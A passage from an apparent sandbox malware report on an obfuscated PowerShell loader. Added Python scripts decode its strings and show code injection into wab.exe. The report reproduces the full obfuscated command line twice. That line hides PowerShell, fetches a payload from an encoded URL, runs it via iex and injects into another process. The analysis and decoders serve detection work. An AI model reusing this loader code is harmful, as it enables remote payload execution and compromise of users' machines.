cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oe
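The two process-creation rows above carry the first stage in the clear: cmd.exe starts a hidden 64-bit powershell.exe, which re-launches the same script under the 32-bit SysWOW64 host. Every string the script needs is wrapped in a call to Forfladigelsens, which assembles the method name Substring from the pieces 'Sub', 'strin' and 'g' (so the name never appears whole) and then keeps every sixth character of its argument starting at offset 5, stopping one character short of the end; the filler between those characters is noise. Inddatafiler223 dot-sources $Rull on whatever it is given, and $Rull decodes to iex, so the anonymous calls are executed immediately. The Python port below is an added example and not part of the Joe Sandbox report. It decodes literals copied verbatim from the rows above ($Varmepudes, $Radernes, $Koglespillets, $Rull, $Bondages and the first Inddatafiler223 argument). The $Gianthood literal is left out on purpose: the rendered report collapsed a run of two spaces inside it, which shifts the stride and garbles everything after "Mozilla/5.0 (Windows NT", so decode from the raw command line (Sysmon Event ID 1, Security 4688 or PowerShell script block log 4104) rather than from an HTML view. The start offset, stride and the regular expression that finds the calls are specific to this sample.

```python
import re

# Added example, not part of the Joe Sandbox report: a Python port of the
# decoder the las.cmd command line defines as Forfladigelsens.
# The PowerShell original is
#   $Tsp = $s.Length - 1
#   for ($i = 5; $i -lt $Tsp; $i += 6) { $out += $s.Substring($i, 1) }
# so the plaintext is every 6th character from offset 5, and the blob's last
# character is never read. Everything else in the literal is filler.
def decode_stride(blob: str, start: int = 5, stride: int = 6) -> str:
    end = len(blob) - 1                  # $Tsp = Length - $Vanddraabes (1)
    return "".join(blob[i] for i in range(start, end, stride))

# "$Name=Forfladigelsens '...'" binds a decoded string; a bare
# "(Forfladigelsens '...')" is handed to Inddatafiler223, which dot-sources
# $Rull on it ($Rull decodes to iex), i.e. the text is executed at once.
def decode_command_line(cmdline: str, decoder: str = "Forfladigelsens"):
    """Return (assigned, executed): {variable: plaintext} for decoded strings
    stored in variables, and a list of decoded strings that run immediately."""
    pattern = re.compile(r"(?:\$(\w+)\s*=\s*\(?\s*)?" + re.escape(decoder)
                         + r"\s+'([^']*)'")
    assigned, executed = {}, []
    for name, blob in pattern.findall(cmdline):
        text = decode_stride(blob)
        if name:
            assigned[name] = text
        else:
            executed.append(text)
    return assigned, executed

# Fragment of the command line, copied verbatim from the report rows.
# The $Gianthood (User-Agent) literal is omitted: the rendered report
# collapsed a double space inside it, which shifts the stride. Decode from
# the raw command line (Sysmon EID 1, Security 4688, PowerShell 4104).
SAMPLE = (
    "$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';"
    "$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';"
    "$Koglespillets=Forfladigelsens 'Flyvn>Overb ';"
    "$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';"
    r"$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';"
    "Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');"
)

if __name__ == "__main__":
    assigned, executed = decode_command_line(SAMPLE)
    for name, text in assigned.items():
        print(f"${name} = {text!r}")
    for text in executed:
        print(f"iex {text!r}")
```

Running it prints the download URL held in $Radernes, the header name User-Agent, the separator > used by $Radernes.split($Koglespillets), the alias iex, the command echo %appdata%\Preaffirmative.Spo && echo t, and the statement $global:Tromlende=(cmd /c $Bondages). That last one explains the odd $Yojuane+=$Tromlende[1] further along: cmd /c prints two lines, the expanded %appdata% path and the letter t, and that t completes New-Object System.Net.WebClien, which is all the $Yojuane literal decodes to on its own. A static decode of the literals therefore never shows the string WebClient; the loader assembles it at run time, and a detection that keys on that string in the command line will miss it.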
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF848F174FB push ebx; iretd 3_2_00007FF848F1756A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF848F1756B push ebx; iretd 3_2_00007FF848F1756A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF848F100BD pushad ; iretd 3_2_00007FF848F100C1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_076008C2 push eax; mov dword ptr [esp], ecx 6_2_07600AC4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0910D130 pushad ; ret 6_2_0910D13B
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0910D13C push es; retf 6_2_0910D1C5
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0910CB46 push edx; ret 6_2_0910CB4F
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0910C5D1 push ebp; ret 6_2_0910C5D7
        Source: C:\Windows\SysWOW64\WindowsPower Shell\v1.0\powershell.exe Code function: 6_2_09113FDB pushad ; ret 6_2_09113FFF
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0910DA02 push ebp; ret 6_2_0910DA03
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0910F036 push E305BC40h; retf 6_2_0910F03B
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0910D237 push es; iretd 6_2_0910D23E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0910D428 push es; ret 6_2_0910D442
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0910DC29 push edx; ret 6_2_0910DC2F
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0910D444 push es; ret 6_2_0910D442
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0910FE90 push es; ret 6_2_0910FE9E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0910B895 push D3F93C37h; ret 6_2_0910B8B3
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0911408C push ds; ret 6_2_09114097
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0910CCB1 push ecx; retf 6_2_0910CCB4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0910D0E2 pushad ; ret 6_2_0910D0E3
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_091138E7 pushad ; retf 6_2_091138E9
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_091102E6 push es; retf 6_2_091102EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0376CB46 push edx; ret 9_2_0376CB4F
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0376D130 pushad ; ret 9_2_0376D13B
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0376D13C push es; retf 9_2_0376D1C5
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0376C5D1 push ebp; ret 9_2_0376C5D7
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_03773FDB pushad ; ret 9_2_03773FFF
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0376D444 push es; ret 9_2_0376D442
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0376F036 push E305BC40h; retf 9_2_0376F03B
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0376D237 push es; iretd 9_2_0376D23E
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0376D428 push es; ret 9_2_0376D442
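The push/ret rows for the SysWOW64 powershell.exe (process 6) and wab.exe (process 9) above list the same instruction sequences at addresses that differ by one constant: 6_2_0910D130 against 9_2_0376D130, 6_2_09113FDB against 9_2_03773FDB, and so on. One blob mapped into both processes at different base addresses looks exactly like that, consistent with the powershell.exe stage having written its code into wab.exe. The script below is an added example, not part of the Joe Sandbox report; it parses rows in the layout shown above (the Source: path is dropped from the sample rows for brevity), groups them by process number and finds the address delta that explains the most matching pairs. The row format and the process numbers 6 and 9 are taken from this report; other reports use the same layout with different numbers.

```python
import re
from collections import Counter, defaultdict

# Added example, not part of the Joe Sandbox report. Joe prints every flagged
# push/ret sequence as "<proc>_<run>_<addr> <instr> <proc>_<run>_<endaddr>".
# If the same instructions turn up in two processes at addresses that differ
# by one constant, the same blob was mapped into both processes.
ROW_RE = re.compile(
    r"Code function:\s+(\d+)_\d+_([0-9A-Fa-f]+)\s+(.+?)\s*\d+_\d+_[0-9A-Fa-f]+\s*$")

def parse_rows(lines):
    """Map process number -> list of (start address, instruction text)."""
    per_proc = defaultdict(list)
    for line in lines:
        m = ROW_RE.search(line)
        if m:
            proc, addr, instr = m.groups()
            per_proc[int(proc)].append((int(addr, 16), instr.strip()))
    return per_proc

def shared_delta(rows_a, rows_b):
    """Most common (addr_a - addr_b) over row pairs with identical instruction
    text, and how many pairs it explains. One delta covering (nearly) all rows
    of the smaller set means one relocated copy of the same code."""
    by_instr = defaultdict(list)
    for addr, instr in rows_b:
        by_instr[instr].append(addr)
    deltas = Counter(a - b for a, instr in rows_a for b in by_instr[instr])
    if not deltas:
        return None, 0
    return deltas.most_common(1)[0]

# Rows copied from the report (the "Source:" path prefix dropped).
REPORT_ROWS = """
Code function: 6_2_076008C2 push eax; mov dword ptr [esp], ecx 6_2_07600AC4
Code function: 6_2_0910D130 pushad ; ret 6_2_0910D13B
Code function: 6_2_0910D13C push es; retf 6_2_0910D1C5
Code function: 6_2_0910CB46 push edx; ret 6_2_0910CB4F
Code function: 6_2_0910C5D1 push ebp; ret 6_2_0910C5D7
Code function: 6_2_09113FDB pushad ; ret 6_2_09113FFF
Code function: 6_2_0910DA02 push ebp; ret 6_2_0910DA03
Code function: 6_2_0910F036 push E305BC40h; retf 6_2_0910F03B
Code function: 6_2_0910D237 push es; iretd 6_2_0910D23E
Code function: 6_2_0910D428 push es; ret 6_2_0910D442
Code function: 6_2_0910DC29 push edx; ret 6_2_0910DC2F
Code function: 6_2_0910D444 push es; ret 6_2_0910D442
Code function: 6_2_0910FE90 push es; ret 6_2_0910FE9E
Code function: 6_2_0910B895 push D3F93C37h; ret 6_2_0910B8B3
Code function: 6_2_0911408C push ds; ret 6_2_09114097
Code function: 6_2_0910CCB1 push ecx; retf 6_2_0910CCB4
Code function: 6_2_0910D0E2 pushad ; ret 6_2_0910D0E3
Code function: 6_2_091138E7 pushad ; retf 6_2_091138E9
Code function: 6_2_091102E6 push es; retf 6_2_091102EE
Code function: 9_2_0376CB46 push edx; ret 9_2_0376CB4F
Code function: 9_2_0376D130 pushad ; ret 9_2_0376D13B
Code function: 9_2_0376D13C push es; retf 9_2_0376D1C5
Code function: 9_2_0376C5D1 push ebp; ret 9_2_0376C5D7
Code function: 9_2_03773FDB pushad ; ret 9_2_03773FFF
Code function: 9_2_0376D444 push es; ret 9_2_0376D442
Code function: 9_2_0376F036 push E305BC40h; retf 9_2_0376F03B
Code function: 9_2_0376D237 push es; iretd 9_2_0376D23E
Code function: 9_2_0376D428 push es; ret 9_2_0376D442
""".strip().splitlines()

def injected_copy(lines, src=6, dst=9):
    """Return (delta, pairs explained, rows in dst) for src -> dst."""
    per_proc = parse_rows(lines)
    delta, hits = shared_delta(per_proc[src], per_proc[dst])
    return delta, hits, len(per_proc[dst])

if __name__ == "__main__":
    delta, hits, total = injected_copy(REPORT_ROWS)
    print(f"process 6 -> 9: delta 0x{delta:08X} explains {hits}/{total} wab.exe rows")
```

Running it reports delta 0x059A0000 explaining 9 of the 9 wab.exe rows, i.e. every flagged sequence in wab.exe has its twin in the 32-bit powershell.exe exactly 0x059A0000 bytes higher. A scattered histogram of deltas would instead mean two unrelated regions that merely share common push/ret byte patterns, which this heuristic flags on its own.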
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  Memory allocated: 24C0000 memory reserve | memory write watch
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  Memory allocated: 20F50000 memory reserve | memory write watch
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  Memory allocated: 20E10000 memory reserve | memory write watch
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 4774
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 5102
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 5870
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 3903
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  Window / User API: threadDelayed 2282
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  Window / User API: threadDelayed 7535
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2964  Thread sleep time: -9223372036854770s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300  Thread sleep count: 5870 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3116  Thread sleep count: 3903 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676  Thread sleep time: -3689348814741908s >= -30000s
        Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5532  Thread sleep time: -23980767295822402s >= -30000s
        Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5396  Thread sleep count: 2282 > 30
        Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5396  Thread sleep count: 7535 > 30
        Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  File Volume queried: C:\ FullSizeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData
        Source: wab.exe, 00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAWhuB
        Source: wab.exe, 00000009.00000002.3240674366.000000000541F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2790829519.000000000541F000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW
        Source: powershell.exe, 00000003.00000002.2611000081.0000027AF1BC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWVe%SystemRoot%\system32\mswsock.dllea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information queried: ProcessInformation
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  Code function: 9_2_0248D01C LdrInitializeThunk,9_2_0248D01C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process token adjusted: Debug
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  Process token adjusted: Debug
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara match  File source: amsi64_6100.amsi.csv, type: OTHER
        Source: Yara match  File source: Process Memory Space: powershell.exe PID: 6100, type: MEMORYSTR
        Source: Yara match  File source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3760000
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 24CFF00
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ 
gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublueJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= 
Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
